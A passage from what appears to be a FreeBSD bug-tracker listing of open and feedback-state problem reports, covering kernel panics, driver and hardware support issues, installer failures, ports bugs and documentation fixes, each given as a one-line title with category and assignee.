[ohci] [panic] ohci_add_done addr not found o ports/107816 roam [patch] The IPv6 patch breaks the location feature of s ports/107814 joerg mail/postfix uses wrong order of -I options s kern/107759 Unable to load a kernel after clean install o kern/107707 geom [geom] [patch] [request] add new class geom_xbox360 to o bin/107692 newfs(8): newfs -O 1 doesn't create consistent filesys o amd64/107639 [ata] Kernel Panic/Crash on dd if=/dev/ad4 of=/dev/ad6 o kern/107622 [ata] can't boot on HP Pavilion dv6000 / problem with o kern/107608 [twa] [hang] Raid Problem beim Zugriff auf Raid o i386/107564 i386 [install] fatal trap 19 during installation on a Dell p stand/107561 standards [libc] [patch] [request] Missing SUS function tcgetsid o kern/107516 multimedia [snd_emu10k1] - skips, clicks and lag after a day of h o bin/107515 [patch] ls(1) bug o usb/107496 usb [uhub] USB device problem on RELENG_6_2 (SHORT_XFER) [ f kern/107446 gavin problems with usb and fw disks o usb/107388 usb [new driver] [patch] add utoppy device from NetBSD o i386/107382 i386 [install] "Fatal trap 12" when installing FreeBSD 6.1 o ports/107354 edwin net/icmpinfo: icmpinfo -vvv does not recocnize any ICM o kern/107342 [dri] Radeon dri breaks system o kern/107305 ipfw [ipfw] ipfw fwd doesn't seem to work f kern/107292 [ata] cannot install - Unable to find device /dev/ad0s f www/107291 murray Keyboard accessibility sabotaged by www/share/sgml/hea f kern/107287 [ata] page fault during install on Intel SATA on Intel o kern/107285 [panic] freeze and reboot by mounting CDROM volume twi o kern/107279 [ath] panic: ath_start: attempted use of a free mbuf! o kern/107277 [panic] bus_dmamap_load_mbuf_sg o usb/107248 usb [umass] [patch] scsi_da.c quirk for Cowon iAUDIO X5 MP o usb/107243 usb [cam] [patch] Apacer USB Flash Drive quirk f ports/107229 openoffice sysutils/coreutils: gcp fails to set default ACL which o kern/107206 [arcmsr] Background fsck causes kernel panic with arcm o bin/107171 [patch] [ncurses] systat(1) doesn't die when it's xter o kern/107154 [pam] pam.d/sshd pam_ssh.so doesn't start ssh-agent s sparc/107087 sparc64 [hang] system is hung during boot from CD o kern/107051 multimedia [sound] only 2 channels output works for the ALC850 (o o conf/107035 net [patch] bridge(8): bridge interface given in rc.conf n o kern/106924 acpi [acpi] ACPI resume returns g_vfs_done() errors and ker f amd64/106918 yongari [re] Asus P5B with internal RealTek PCIe Ethernet gets o docs/106916 chinsan Wrong tar command at topic 17.6.8 in Handbook o bin/106872 [patch] [request] extattr support for find(1) o usb/106861 usb [usbdevs] [patch]: usbdevs update: Add product ACER Ze o kern/106851 [vge] vge0: MII read timed out [regression] o i386/106850 i386 [powerd] powernow0 attach returned 6 s ports/106848 portmgr [PATCH] Mk/bsd.port.mk -- Add support to remove locale s usb/106832 usb [usb] USB HP printer is not detected by kernel when AC o i386/106789 i386 [nfe] or [nve]: Internal NIC of GA-K8N51GMF-RH does no o kern/106786 No reboot with FreeBSD and Mylex Acceleraid 352 o kern/106783 [fdc] umount of a floppy disk results in a reboot o bin/106734 [patch] [request] bzip2(1): SSE2 optimization for bzip o bin/106726 ntpd(8): ntp functions return wrong values o kern/106722 glebius [net] [patch] ifconfig may not connect an interface to p bin/106674 mav atacontrol(8): "atacontrol attach" doesn't work with S o usb/106648 usb [umass] [hang] USB Floppy on D1950 10 min Hang on Inse o kern/106646 [nfs] [patch] Pointer incorrectly cast to ulong o kern/106645 [uart] [patch] uart device description in 7-CURRENT is o kern/106632 trhodes [msdosfs] gimp destroys files on fat32 upon opening o usb/106621 usb [axe] [patch] DLINK DUB-E100 support broken s ports/106616 portmgr bsd.port.mk: Default file modes set incorrect for non- o usb/106615 usb [uftdi] uftdi module does not automatically load with o kern/106496 kris [softupdates] Can't remount filesystem as read only af o i386/106493 ru [patch] pxeboot(8) uses /pxeroot instead of / o kern/106490 [atapicam] atapicam fails with ATAPI-CD/DVD drives att o ports/106483 portmgr [patch] embed distfile information in +CONTENTS o kern/106444 [netgraph] Kernel Panic on Binding to an ip to a virtu o kern/106438 net [ipf] ipfilter: keep state does not seem to allow repl o kern/106432 [ata] Record of disks (DVD-R) through the k3b program o bin/106431 [patch] atacontrol(8): Inform user of ata RAID5 acting o bin/106355 [headers] macros in stdio.h non-portable (e.g., C++ :: s kern/106340 [ata] [request] Need to control disk write cache on pe o kern/106316 net [dummynet] dummynet with multipass ipfw drops packets o kern/106275 [hifn] Hifn 7955 on Soekris Engineering vpn1401 return o kern/106255 trhodes [msdosfs] [patch]: correct setting of archive flag o kern/106243 net [nve] double fault panic in if_nve.c on high loads o amd64/106186 amd64 [panic] panic in swap_pager_swap_init (amd64/smp/6.2-p o docs/106135 doc [request] articles/vinum needs to be updated o misc/106107 left-over fsck_snapshot after unfinished background fs p bin/106049 [patch] tftpd(8) - improve -w option to support unique o usb/106041 usb [usb] [request] FreeBSD does not recognise Mustek Bear o kern/106030 fs [ufs] [panic] panic in ufs from geom when a dead disk o kern/106028 [pxeboot] tftp inside pxeboot isn't initialised proper o conf/106009 rc [ppp] [patch] [request] Fix pppoed startup script to p p docs/105997 trhodes sys/kern/sys_pipe.c refer to tuning(7), but there is n o kern/105945 net Address can disappear from network interface s kern/105943 net Network stack may modify read-only mbuf chain copies o bin/105925 net problems with ifconfig(8) and vlan(4) [regression] o bin/105860 top(1) user ID misalignment in mixer username/uid mode o conf/105689 rc [ppp] [request] syslogd starts too late at boot o bin/105614 [patch] setkey(8): Creating NULL encryption ESP SAs wi o docs/105608 doc fdc(4) debugging description staled o kern/105604 [bktr] [patch] add support for Pixelview PlayTV Pro 2 o kern/105579 piso [libalias] dcc resume over natd in 6.x o conf/105568 rc [patch] [request] Add more flexibility to rc.conf, to o kern/105539 newly added disk devices don't have slice-devices crea o kern/105537 acpi [acpi] problems in acpi on HP Compaq nc6320 s kern/105533 [ahd] adaptec 29320 causes panic with over 4GB f amd64/105531 amd64 [ata] gigabyte GA-M51GM-S2G / nVidia nForce 430 - does f amd64/105514 amd64 [boot] FreeBSD/amd64 - Fails to boot on HP Pavilion dv o kern/105500 SCSI install on Microsoft Virtual Server 2005 doesn't f java/105482 java diablo-jdk1.5.0/jdk-1.5.0 java.nio.Selector bug o docs/105456 keramida [patch] overhaul of the security chapter (14) o kern/105375 yongari [sk] 2 x Marvell GBit LAN: device sk0 is attached, but f ports/105374 portmgr PR 100555 DESTDIR changes break BSD.lib.mk o kern/105368 [geli] geli passphrase prompt malfunctioning when moun o usb/105361 usb [panic] Kernel panic during unmounting mass storage (C o kern/105348 net [ath] ath device stopps TX o bin/105341 [libpam] [patch] [request] pam_krb5: Add minimum_uid/m o www/105333 www [patch] Base selection in events in libcommon.xsl does o kern/105330 ipfw [ipfw] [patch] ipfw (dummynet) does not allow to set q o kern/105241 [nfs] problem with Linux NFS server up/down combined w o gnu/105221 grep(1): `grep -w -F ""` issue o usb/105186 usb [ehci] [panic] USB 2.0/ehci on FreeBSD 6.2-PRE/AMD64 c o i386/105175 i386 [ipmi] ipmi acpi trouble on supermicro server o kern/105169 [panic] cp hangs on copy to a compact flash card o conf/105145 rc [ppp] [patch] [request] add redial function to rc.d/pp o alpha/105134 alpha 'panic: lockmgr: thread ... not exclusive lock owner' f conf/105100 ache [patch] [locale] no support for lv (latvian) locale o kern/105093 fs [ext2fs] [patch] ext2fs on read-only media cannot be m o kern/105067 K8D Master-F and other 8111/8131 boards will not run S o usb/105065 usb [ata] [usb] SATA - USB Bridge o i386/105063 i386 [sio] US Robotics (3Com) 3CP5609 PCI 16550 Modem works o sparc/105048 sparc64 [trm] trm(4) panics on sparc64 o kern/104978 jfv [em] jumbo frames has been broken in RELENG_6 by last s kern/104950 [ata] [request] no support for SATA controller Initio o bin/104921 ipfw [patch] ipfw(8) sometimes treats ipv6 input as ipv4 (a o ports/104910 nobutaka portsdb -Uu fails on building lsdb when EMACS_NAME is o kern/104882 [iicbb] [patch] pvr250 and pvrxxx drivers need iicbb p o docs/104879 doc Howto: Listen to IMA ADPCM .wav files on FreeBSD box o kern/104874 multimedia [snd_emu10k1] kldload snd_emu10k1 hangs system o kern/104862 [bge] BCM5704 only works at 10Mbit o kern/104851 net [inet6] [patch] On link routes not configured when usi o bin/104850 ppp(8): ppp problem on TCP link o usb/104830 usb [umass] system crashes when copying data to umass devi o kern/104826 andre [bge] FreeBSD 6.1 not RFC 768 (UDP) compliant on Compa o kern/104822 [hang] RELENG_6 hangs with VIA VT8237A chipset [regres p kern/104818 [ata] Missing driver Silicon Image SiI 3132 SATA II PC o bin/104809 cron(8): incorrect cron behavior with mday field = "*/ o kern/104799 [ata] Several ata observations ICH8 BIOS o kern/104755 Making ISO image with k3b hangs 6.2-PRERELEASE o kern/104751 net [netgraph] kernel panic, when getting info about my tr o bin/104746 [patch] traceroute(8): 'traceroute -e -P TCP' cannot w o java/104744 glewis java/berkeley-db installation error o stand/104743 standards [headers] [patch] Wrong values for _POSIX_ minimal lim o kern/104738 mlaier [inet] [patch] Reentrant problem with inet_ntoa in the o bin/104731 gad [patch] missing newline in lpq(1) output o i386/104719 i386 [ata] Seagate ST3802110A errors/delays when using PIO4 s bin/104689 matteo [patch] [request] powerd(8): add support for limiting o kern/104682 ipfw [ipfw] [patch] Some minor language consistency fixes a o kern/104675 [bktr] METEORSINPUT seemingly not setting input o usb/104645 usb [umass] [request] Rave C-201 MP3 player does not commu o kern/104626 multimedia [sound] FreeBSD 6.2 does not support SoundBlaster Audi o kern/104625 acpi ACPI on ASUS A8N-32 SLI/ASUS P4P800 does not show ther o kern/104624 Sound, mouse and keyboard badly interrupted while I/O f i386/104572 i386 [ata] issues with detecting HDD on Intel Q965 Express o kern/104569 glebius panic w/zebra o bin/104553 [patch] [request] Add login group support to login.acc o conf/104549 rc [patch] rc.d/nfsd needs special _find_processes functi o gnu/104533 bugmeister [patch] [request] make send-pr(1) read configuration f o docs/104493 roberto [patch] Wrong description in ntp.conf(5) (CURRENT and o kern/104486 TI1131 Cardbus Bridge cannot detect card insertion on o kern/104485 net [bge] Broadcom BCM5704C: Intermittent on newer chip ve o i386/104473 i386 [boot] boot loader reboots before loading kernel on Al o bin/104456 stefanf sh(1): /bin/sh unable to enter deep directories o docs/104432 trhodes No mention of "let" shell builtin in manual pages. o sparc/104428 sparc64 [nullfs] nullfs panics on E4500 (but not E420) o kern/104406 fs [ufs] Processes get stuck in "ufs" state under persist o kern/104389 geom [geom] [patch] sys/geom/geom_dump.c doesn't encode XML o usb/104352 usb [ural] [patch] ural driver doesnt work o i386/104349 i386 [bfe] Panic while uploading data via bfe network inter o amd64/104311 ports/wine should be installable on amd64 o usb/104292 usb [umass] [hang] system lockup on forced umount of usb-s o usb/104290 usb [umass] [patch] quirk: TOSHIBA DVD-RAM drive (libretto p kern/104212 [puc] [patch] support for Kuroutoshikou SERIAL4P-LPPCI f kern/104133 fs [ext2fs] EXT2FS module corrupts EXT2/3 filesystems o bin/104092 [patch] iostat(8): missing blanks in iostat output o kern/104079 [fdc] [patch] kldunload fdc.ko leads to panic: mutex G o threa/103975 threads Implicit loading/unloading of libpthread.so may crash o www/103938 brd cvs-src archive does not rebuild since 12 Mar 2006 o usb/103917 usb [uhub] USB driver reports "Addr 0 should never happen" o bin/103890 w(1) doesn't see sessreg'd entries in utmp o kern/103883 [ata] DMA is not defaulted on WDMA device (SIS integra a bin/103873 csjp login(1) SEGFAULT on unsuccessful login o kern/103862 [fdc] [patch] Error with fdformat on -CURRENT o bin/103845 sha256(1): sha256 /dev/acd0 returns immediately o docs/103807 danger wicontrol(8) manpage contains a broken URL o conf/103794 adding other login class to login.conf in case one is o kern/103792 Multiple Logins: ; a 't' appears at prompt o kern/103764 [libradius] [patch] libradius aborts server processing o bin/103762 ppp(8): some tun interfaces with a mtu of 1500 while i o ports/103751 nork databases/linux-oracle-instantclient-sqlplus: ldconfig o kern/103733 [agp] i915 driver on hp dc7100: device not recognized o kern/103715 [bge] [request] Broadcom BCM5708SKFB not recognised by o bin/103712 amd(8): Automounter is apparently not passing flags to o bin/103682 [patch] [request] nfsstat(1) should use %u instead of o ports/103669 ale mysql-server rc script can not use mysql_flags variab s i386/103624 i386 [ata] [install] Problem installing on Dell Powervault o kern/103615 emaste [aac] [patch] aac(4) update to the last version availa s kern/103603 6.1 install-boot from floppies fails o kern/103578 [ums] ums does not recognize mouse buttons o kern/103532 [irq] Interrupt storm in 6.2-PRERELEASE [regression] o ports/103529 gecko www/seamonkey: enable SVG and Pango font rendering sup o www/103522 www Search interface oddity o kern/103498 [keyboard] momentary system "pauses" when switching VT s kern/103495 vwe [vr] if_vr locks after carrier event p conf/103489 bz [rc.d] [named] [jail] [patch] named_chroot_autoupdate p kern/103464 bz [dns] [jail] jail networking failures to 127.0.0.1 onl o kern/103455 "swap_pager: indefinite wait buffer" with page file en o kern/103454 ipfw [ipfw] [patch] [request] add a facility to modify DF b o usb/103418 usb usbhidctl(1): [patch] [request] usbhidctl: add ability o kern/103332 yongari [fxp] fxp driver does not work correctly on Intel 8255 o kern/103328 ipfw [ipfw] [request] sugestions about ipfw table o kern/103312 [libc] dlsym(NULL,) doesn't work properly o usb/103289 usb [request] USB 2.0 problems on AMD LX-800 CPU and CS-55 o kern/103283 pf pfsync fails to sucessfully transfer some sessions o kern/103281 pf pfsync reports bulk update failures o kern/103256 jfv [em] em0: watchdog timeout -- resetting (6.1-STABLE) o kern/103253 thompsa inconsistent behaviour in arp reply of a bridge o kern/103250 [puc] puc failed to attach sio ports when loaded as mo o kern/103200 [ral] ral driver for RELENG_6 is out-of-date with resp o kern/103191 net Unpredictable reboot o kern/103135 net [ipsec] ipsec with ipfw divert (not NAT) encodes a pac p kern/103075 [ata] SATA disk attach/unplug from a MV88SX5041 freeze o i386/103063 i386 [install] Can not install on Dell XPS 700 o usb/103046 usb [ulpt] [patch] ulpt event driven I/O with select(2) an a kern/103041 linimon [ipmi] unloading ipmi panics Dell PE 2850, ipmi doesn' o kern/103035 fs [ntfs] Directories in NTFS mounted disc images appear o usb/103025 usb [uhub] [panic] wrong detection of USB device for FreeB o kern/103022 cperciva [headers] /usr/include/crypto/rijndael.h is wrong o usb/102976 usb [panic] Casio Exilim Digital Camera causes panic on in p kern/102956 dchagin [linux] [patch] Add partial support for SO_PEERCRED in o ports/102954 obrien textproc/urlview: switch from netscape to one gecko. o ports/102946 secteam [patch] ports-mgmt/portaudit o kern/102943 kan [xfs] kernel crash when unloading the xfs kernel modul o java/102888 glewis Diablo 1.5.0 throws FileNotFoundException when opening a bin/102834 [patch] mail(1) hangs on the sigsuspend system call in o bin/102793 edwin [patch] [request] top(1): display feature of current C o kern/102784 [keyboard] system crashes when using hardware function o kern/102783 [acpi] hw.acpi has thermal controls backwards when ext f kern/102741 andre [tcp] Multiple outbound connect() calls produce 'Netwo o docs/102719 doc [patch] ng_bpf(4) example leads to unneeded promiscuos o amd64/102716 amd64 ex with no argument in an xterm gets SIGSEGV o conf/102700 rc [geli] [patch] Add encrypted /tmp support to GELI/GBDE o usb/102678 usb [keyboard] Dell PowerEdge DRAC5 USB Keyboard does not p kern/102653 andre [tcp] TCP stack sends infinite retries for connection o bin/102638 matteo [patch] sysinstall(8): custom dist set always install o i386/102617 vwe [smbfs] [editors/ooo] 7 x "smb_maperror: Unmapped erro o kern/102612 [asr] da0 not detected when sharing bus with ch0 devic o bin/102609 [patch] Add filtering capability to date(1) o i386/102562 i386 [em] no traffic pass through a em card after approx. a o kern/102549 [bktr] [patch] fix Pixelview PlayTV Pro 2 on bktr o kern/102540 [netgraph] [patch] supporting vlan(4) by ng_fec(4) o bin/102515 [libc] fsck_ufs crashes if no console at all o conf/102502 net [netgraph] [patch] ifconfig name does't rename netgrap s ports/102499 rik lftp asc file checksum mismatch o bin/102498 sysinstall(8): Cursor doesn't track sysinstall hilight o kern/102471 ipfw [ipfw] [patch] add tos and dscp support o i386/102410 i386 [install] FreeBSD 6.1-RELEASE installation boot freeze o bin/102394 [patch] ls(1) do not shows inode number symbolic link o kern/102390 [pppd] [patch] kernel pppd don't using pam o kern/102363 "Resource temporarily unavailable" message from dvd+rw o bin/102357 [patch] tcsh(1)/csh(1) jobs control: sometimes 'fg' co o bin/102299 [patch] grep(1) malloc abuse? o kern/102252 acpi acpi thermal does not work on Abit AW8D (intel 975) o kern/102250 trhodes [msdosfs] panic upon forced umount of removed medium o bin/102232 gad Defects in -O option to ps(1) o kern/102211 [ar] [patch] detach raid member and reboot will cause o bin/102205 kdc(8): login failure: ssh + gssapi + dual stacks + pa o bin/102162 [patch] tftpd(8): Limit port range for tftpd o usb/102066 usb [ukbd] usb keyboard and multimedia keys don't work o kern/102035 net [plip] plip networking disables parallel port printing o kern/101948 net [ipf] [panic] Kernel Panic Trap No 12 Page Fault - cau o kern/101926 [ar] 6.1-STABLE crashes under heavy disk I/O and acces o bin/101921 [request] security.bsd.see_other_uids for further prog o kern/101819 [ar] [patch] ata driver wrongly determines type RAID o o kern/101794 [pfsync] Setting plip as syncdev for pfsync causes ker o usb/101775 usb [libusbhid] [patch] possible error in report descripto a bin/101762 sysinstall(8) does not obey /usr/ports symlink while i o usb/101761 usb [usb] [patch] [request] usb.h: increase maximal size o o usb/101752 usb [umass] [panic] 6.1-RELEASE kernel panic on usb device o kern/101734 [ata] -CURRENT cannot see SATA drive on ASUS A8N-SLI ( o kern/101618 kernel panic on multiple Dell PE2850s o i386/101616 i386 [hang] FreeBSD freeze on bootup, Compaq Proliant (lega a ports/101566 apache www/apache20 All .svn subdirectories in $(htdocsdir) g o docs/101464 doc sync ru_RU.KOI8-R/articles/portbuild/article.html with s ports/101450 stas multimedia/transcode: tcprobe broken for devfs o usb/101448 usb [ohci] FBSD 6.1-STABLE/AMD64 crashes under heavy USB/O o kern/101417 multimedia [sound] 4-speakers output not possible on Asus A8V-Del o ports/101340 danfe x11/nvidia-driver: Vidcontrol Causes Video Corruption o kern/101324 fs [smbfs] smbfs sometimes not case sensitive when it's s o threa/101323 threads [patch] fork(2) in threaded programs broken. o kern/101274 yongari [sk] [patch] SysKonnect Yukon initialization bug on K8 o docs/101271 remko serial console documentation implies kernel rebuild re p kern/101228 edwin [nanobsd] [patch] Two more entries for FlashDevice.sub o kern/101226 jfv [em] Access to IPMI module is lost when the em driver o ports/101166 bittorrent-curses only works under English locales. o usb/101096 usb [ural] [panic] USB WLAN occasionally causes kernel-pan o i386/101062 i386 [hang] Freeze on detect Intel 900 VGA on boot with ACP f kern/101061 vwe [fpa] fea/fpa (DEC FDDI NIC) driver causes kernel pani o kern/100974 rwatson [panic] sorele. FreeBSD 6.1 RELEASE i386 o bin/100956 remko [patch] support setting carp device state with ifconfi o bin/100921 [patch] tftpd(8): libexec/tftpd: `-w' non-traditional o bin/100914 [patch] tftpd(8): libexec/tftpd: write access control o kern/100859 multimedia [snd_ich] snd_ich broken on GIGABYTE 915 system o kern/100858 davidch [bce] Broadcom bce driver and SMP hangup f kern/100839 yongari [txp] txp driver inconsistently stops working when the o i386/100831 i386 [sio] sio ignores BIOS information about serial ports s threa/100815 threads FBSD 5.5 broke nanosleep in libc_r s bin/100805 yar WITHOUT_INET6 is ignored by many src/ components o docs/100803 jhb [patch] the man page about ithread is expired. o conf/100782 [keyboard] [patch] Default keymap to support ALT+Left, o ports/100776 sem Failure to update devel/mico by portupgrade o usb/100746 usb [keyboard] system does not boot due to USB keyboard pr o kern/100709 net [libc] getaddrinfo(3) should return TTL info o kern/100687 [psm] psm problem (?): touchpad hangs, then move supe o conf/100616 [patch] syslog.conf: lines after exclamation point ign o bin/100535 [patch] cal(1) and ncal(1) do not take into account mu o kern/100519 net [netisr] suggestion to fix suboptimal network polling o kern/100516 [atapicam] atapicam with ITE IT8212F crashes the syste p kern/100513 jhb [smbus] Inconsistent definition of SMBus addresses in o ports/100504 skv [PATCH] databases/p5-Class-DBI: Reduce dependencies o kern/100499 yongari [vr] vr interface stops transmitting a bin/100496 [patch] Fix to get rid of the telnet(1) to cisco probl o bin/100442 obrien ftpd(8): lukemftpd core dumps on anonymous login o bin/100436 kensmith sysinstall(8): live CD fixit mount does not find mount f ports/100431 dougb port print/hpijs default config interferes with print/ o bin/100424 [patch] ssh(1): SSH option BindAddress is ignored by o o i386/100420 i386 [boot] boot1/boot2 lba error o kern/100410 [bge] bge driver disables access to shared iLo on HP D o misc/100322 [tools] [patch] kerninclude.sh doesn't dump object nam o bin/100320 edwin [request] Update top(1) to 3.6 o kern/100290 yongari [rl] rl0: watchdog timeout [regression] p docs/100242 trhodes sysctl(3) description of KERN_PROC is not correct anym o kern/100219 bz [ip6] IPV6_PKTOPTIONS and possible mbuf exhaustion. o i386/100204 i386 FreeBSD reports raid as broken - but it is not o docs/100196 doc man login.conf does explain not "unlimited" s kern/100170 [request] Support login class in ldap directory o i386/100142 i386 [pci] [patch] /dev/smb0 device not available on system o misc/100133 [boot] keyhit function in boot2.c that falls into an i a bin/100089 [patch] ftp(1): default ftp application of FreeBSD giv o bin/100018 [patch] newsyslog(8) does not check size if time_at is o stand/100017 standards [Patch] Add fuser(1) functionality to fstat(1) o kern/99989 panic when detaching disks o kern/99979 [patch] Get Ready for Kernel Module in C++ s bin/99973 yar systat(1): systat -ifstat traffic counter overflow o kern/99954 scsi [ahc] reading from DVD failes on 6.x [regression] o bin/99896 gad [patch] lpr(1): lpr -r flag has no effect o kern/99850 [ar] ataraid hangs in g_waitidle when attaching to nVi o kern/99800 [libc] [patch] Add support for profiling multiple exec o kern/99765 drifting time, SuperMicro PDSMi Motherboard, "calcru n o kern/99758 [pty] [patch] chown/chmod pty slave side in kernel o conf/99721 rc [patch] /etc/rc.initdiskless problem copy dotfile in s o kern/99664 mountd and/or nfsd have to sometimes have to be restar o bin/99662 rpc.rquotad(8): quota information leak while rpc.rquot o kern/99652 [ata] nVidia nForce MCP51 controller hangs w/ 2 drives o misc/99643 linimon request to remove src/tools/tools/portsinfo because it o misc/99627 [build] [patch] make update & CVSROOT o i386/99608 i386 [atapicam] ATAPI or CAM crash on FreeBSD 6.1-stable wi o kern/99607 [pppd] pppd hangs kernel due to interrupt flood from s o kern/99567 [ata] Powerup of sleeping IDE drives causes system reb o bin/99566 jail [jail] [patch] fstat(1) according to specified jid o usb/99538 usb [keyboard] while using USB keyboard default params of o kern/99529 [amr] DELL PowerEdge 2600 with streamer PowerVault 100 o docs/99506 doc FreeBSD Handbook addition: IPv6 Server Settings o kern/99485 Disk IO Causes multimedia/mplayer To Drop Frames o conf/99444 rc [patch] Enhancement: rc.subr could easily support star o usb/99431 usb [keyboard] FreeBSD on MSI 6566E (Intel 845E motherboar s kern/99421 [request] Option Globetrotter Fusion card not recogniz o kern/99408 [ppp] problems with ppp and arp a docs/99356 ru man page of sendmsg(2) does not include EINVAL o conf/99328 linimon [patch] updates for src/share/examples/cvsup o bin/99307 [patch] mount_nfs(8) incompatible with zVM VMNFS 3A0 o www/99305 bugmeister send-pr.html is frustrating/broken o kern/99290 fs [ntfs] mount_ntfs ignorant of cluster sizes o bin/99217 [patch] pam_ssh(8) waits for a wrong ssh-agent PID at o kern/99200 usb [bluetooth] SMP-Kernel crashes reliably when Bluetooth o kern/99188 andre [tcp] [patch] FIN in same packet as duplicate ACK is l o www/99184 wosch Viewing HP-UX manpages with http://www.freebsd.org/cgi o gnu/99173 [patch] replace gnu patch with a bsd-licensed one. o kern/99094 [linprocfs] panic: sleeping thread (Sleeping thread .. o kern/99088 [ata] Critical Problems with VIA 8251 SATA2/RAID Contr f kern/99068 [linux] [patch] Linux emulator crashed by java, when c o kern/99017 [ata] [patch] FreeBSD versions above 5.3 panic if atap o kern/98978 net [ipf] [patch] ipfilter drops OOW packets under 6.1-Rel o docs/98974 doc Missing tunables in loader(8) manpage o kern/98962 remko [ata] [burncd]: [patch] writing >1 session on ATAPI CD o i386/98932 i386 [i386] [patch] Kernel compilation failed on specific P o kern/98873 des [libfetch] allow fetch(3) to force using of ipv4 or ip o kern/98831 ipfw [ipfw] ipfw has UDP hickups o kern/98804 [ar] VIA V-RAID metadata mis-read (MSI K8MMV with the o www/98798 www Our statistics page is out of date o kern/98788 [syscons] [patch] Add sysctl to disallow VT_LOCKSWITCH o i386/98765 i386 [ata] timeouts on sata drive (Asus a7n8x-e) o docs/98759 doc [patch] sbp_targ(4) man page missing reference to devi o kern/98752 multimedia [sound] Intel ich6 82801 FB - on Packard Bell A8810 la o kern/98597 net [inet6] Bug in FreeBSD 6.1 IPv6 link-local DAD procedu o bin/98577 [patch] dhclient(8): the link check by dhclient slows o bin/98542 [pppd] pppd(8) daemon unexpectently died , Exit 1 o kern/98504 multimedia [sound] Sound is distorted with SB Live 5.1 o kern/98496 multimedia [snd_ich] some functions don't work in my sound kernel o bin/98468 newsyslog(8): Value over 99 in newsyslog.conf count fi o kern/98460 [kernel] [patch] fpu_clean_state() cannot be disabled o kern/98388 [ata] FreeBSD 6.1 - WDC WD1200JS SATA II disks are see p misc/98383 yar [request] include the mt command in the rescue CD o i386/98366 i386 [em] Intel PRO/1000 MT Dual PCI-X: simulatenious 1000 f docs/98344 linimon [patch] An update of the article "Choosing the FreeBSD o usb/98343 usb [boot] BBB reset failed errors with Creative Muvo MP3 o bin/98220 wpa_supplicant(8) operation does not match documentati o bin/98218 net wpa_supplicant(8) blacklist not working o i386/98215 i386 [geode] [regression] FreeBSD can no longer boot Geode o kern/98167 multimedia [sound] [es137x] [patch] ES1370 mixer volumes incorrec s kern/98162 [request] AcerHK driver port needed for enabling WiFi o i386/98154 i386 6-STABLE crashes when being online via modem (Fujitsu o docs/98115 doc Missing parts after rendering handbook to RTF format o kern/98091 scottl [mfi] [patch] Makefile style of mfi kernel module brok o kern/98034 geom [geom] dereference of NULL pointer in acd_geom_detach p kern/98015 remko [bfe] [patch] bfe(4): double free in error handling pa o kern/97996 [ata] DMA is broken for VIA 82C596B UDMA66controller o kern/97951 ipfw [ipfw] [patch] ipfw does not tie interface details to a kern/97921 rwatson [socket] close() socket deadlocks blocked threads p conf/97697 matteo [patch] rc.conf - jail__exec_afterstart[0..n] o kern/97665 [sio] hang in sio driver o kern/97609 multimedia [sound] Load Sound Module - VIA8233 - fails o ports/97544 sumikawa patch for net/zebra's ospfd snmp o kern/97535 multimedia [snd_mss] doesn't work in 6.0-RELEASE and above for Cr o kern/97517 [fdc] Floppy device lost permissions when active flopp o kern/97505 [procfs] file entry of procfs points to "unknown" o kern/97504 ipfw [ipfw] IPFW Rules bug s bin/97498 [request] newfs(8) has no option to clear the first 12 o bin/97478 umount(8): umount -f /card -> hardware-reset is needed o usb/97472 usb [cam] [patch] add support for Olympus C150,D390 o java/97461 java Diablo JDK does not report Update level in a format su o kern/97401 [xe] Xircom CreditCard Ethernet 10/100, attach returne f bin/97392 net ppp(8) hangs instead terminating o kern/97383 acpi Volume buttons on IBM Thinkpad crash system with ACPI o kern/97381 [fdc] [patch] Patch to add zero-sector and spanned-sid o kern/97377 fs [ntfs] [patch] syntax cleanup for ntfs_ihash.c o amd64/97337 amd64 [dri] xorg reboots system if dri module is enabled o kern/97329 [nfs] [patch] code simplification o kern/97326 emulation [linux] file descriptor leakage in linux emulation o kern/97306 net [netgraph] NG_L2TP locks after connection with failed o i386/97287 i386 Screen Corruption In FreeBSD 6.X When Apps Started In s usb/97286 usb [mouse] [request] MS Wireless Intellimouse Explorer 2. s kern/97266 [fdc] System hangs at kernel time after boot: /dev/fd0 o kern/97265 System hangs at the end of shutdown -h now o i386/97263 i386 [ata] FreeBSD only detects first drive on PDC20378 378 o kern/97208 firewire [firewire] System hangs / locks up when a firewire dis o usb/97175 usb [umass] [hang] USB cardreader hangs system o kern/97164 [libdisk] libdisk's Open_Disk() crashes o kern/97153 [patch] When -NO_KERBEROS is set, libcom_err still get o bin/97108 sysinstall(8): write failure on transfer (wrote -1 byt o bin/97083 [patch] passwd(1) does not support _PWF_HESIOD o i386/97025 i386 [vmware] fbsd (2 cd) dont install in vmware 5.5.0 - re o conf/97014 [gif] gifconfig_gif? in rc.conf does not recognize IPv o bin/97002 [patch] cron(8) fails quietly if /usr/sbin/sendmail is o kern/97000 [kernel] [patch] bogus "All threads purged from ugen0. o kern/96999 [procfs] [patch] procfs reports incorrect information o kern/96974 obrien [patch] to build FreeBSD kernel with binutils 2.16.92 a ports/96953 apache www/apache22 port uses its own directories o kern/96927 [loader] Loader(8) cause kernel death on "boot -a" [re o bin/96854 imp [patch] devd(8) parses events incorrectly in some case a bin/96840 [libc] [patch] getgrent() does not return large groups o conf/96746 [nanobsd] [patch] Configuration changes and README for f kern/96743 yongari [sk] [patch] broken 32-bit register operations o kern/96644 [panic] umount(8) crash after mount/umount disturbance o conf/96589 Periodic monthly invalid times with 32 character usern o bin/96540 [patch] catman(1) does not deal correctly with hard-li o kern/96538 multimedia [sound] emu10k1-driver inverts channels o usb/96457 usb [umass] [panic] fatback on umass = reboot o kern/96429 [kernel] [patch] kern_linker.c hardcodes "/boot/kernel f conf/96412 linimon [rpc] 2 rpc.lockds launched at boot ? blocking problem o i386/96406 i386 System freezes on IBM xSeries 335 with FreeBSD-6.0-REL f kern/96393 [libz] [patch] assembler implementations for libz on i o i386/96382 i386 [bge] In 6.1-RC1 the bge driver does not reliably work o usb/96381 usb [cam] [patch] add a quirk table entry for a flash ram o i386/96357 i386 FreeBSD cannot recognize all the logical partitions o kern/96346 [modules] [patch] disable build of modules that are al o conf/96343 rc [patch] rc.d order change to start inet6 before pf f i386/96302 gavin [ata] nVidia nForce CK804 SATA300 controller not recog f kern/96286 [cbb] [panic] TI1131 PCI CardBus Bridge: driver cbb le f kern/96268 net [socket] TCP socket performance drops by 3000% if pack o conf/96247 matteo [patch] 550.ipfwlimit reports logs even if log size is o stand/96236 standards [patch] [posix] sed(1) incorrectly describes a functio f i386/96225 gavin [boot] Toshiba M70-CL3 Hangs Up During Booting o usb/96224 usb [usb] [msdosfs] mount_msdosfs cause page 